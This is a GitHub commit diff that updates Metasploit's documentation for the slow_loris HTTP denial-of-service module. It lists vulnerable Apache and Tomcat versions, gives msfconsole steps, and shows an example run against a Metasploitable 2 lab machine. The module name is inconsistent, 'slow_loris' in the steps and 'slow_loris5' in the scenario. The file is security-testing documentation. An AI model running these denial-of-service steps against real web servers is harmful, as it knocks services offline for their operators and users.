Skip to content

Commit 6d2007a

Browse files
DanielRTeixeiramkienow-r7
authored andcommitted
Update slow_loris.md
1 parent b7bc68c commit 6d2007a

File tree

1 file changed

+14
-14
lines changed

1 file changed

+14
-14
lines changed

documentation/modules/auxiliary/dos/http/slow_loris.md

Lines changed: 14 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -2,42 +2,42 @@
22

33
This module tries to keep many connections to the target web server open and hold them open as long as possible.
44

5+
To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/).
6+
57
Vulnerable app versions include:
68

79
- Apache HTTP Server 1.x and 2.x
810
- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta
911

10-
Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/).
11-
1212
## Verification Steps
1313

1414
1. Start msfconsole
15-
2. Do: use auxiliary/dos/http/slow_loris
16-
3. Do: set RHOST
17-
4. Do: run
15+
2. Do: `use auxiliary/dos/http/slow_loris`
16+
3. Do: `set RHOST`
17+
4. Do: `run`
1818
5. Visit server URL in your web-browser.
1919

2020
## Scenarios
2121

2222
### Apache/2.2.8 - Ubuntu 8.04
2323

2424
```
25-
msf > use auxiliary/dos/http/slow_loris.rb
26-
msf auxiliary(slow_loris) > show options
25+
msf > use auxiliary/dos/http/slow_loris5
26+
msf auxiliary(slow_loris5) > show options
2727
28-
Module options (auxiliary/dos/http/slow_loris):
28+
Module options (auxiliary/dos/http/slow_loris5):
2929
3030
Name Current Setting Required Description
3131
---- --------------- -------- -----------
32-
RHOST 192.168.216.129 yes The target address
32+
HEADERS 10 yes The number of custom headers sent by each thread
33+
RHOST yes The target address
3334
RPORT 80 yes The target port (TCP)
34-
THREADS 5000 yes The number of concurrent threads
35-
TIMEOUT 60 yes The maximum time in seconds to wait for each request to finish
35+
THREADS 1000 yes The number of concurrent threads
3636
37-
msf auxiliary(slow_loris) > set RHOST 192.168.216.129
37+
msf auxiliary(slow_loris5) > set RHOST 192.168.216.129
3838
RHOST => 192.168.216.129
39-
msf auxiliary(slow_loris) > run
39+
msf auxiliary(slow_loris5) > run
4040
41-
[*] 192.168.216.129:80 - Executing requests 1 - 5000...
41+
[*] 192.168.216.129:80 - Executing requests 1 - 1000...
4242
4343
```

0 commit comments

Comments
 (0)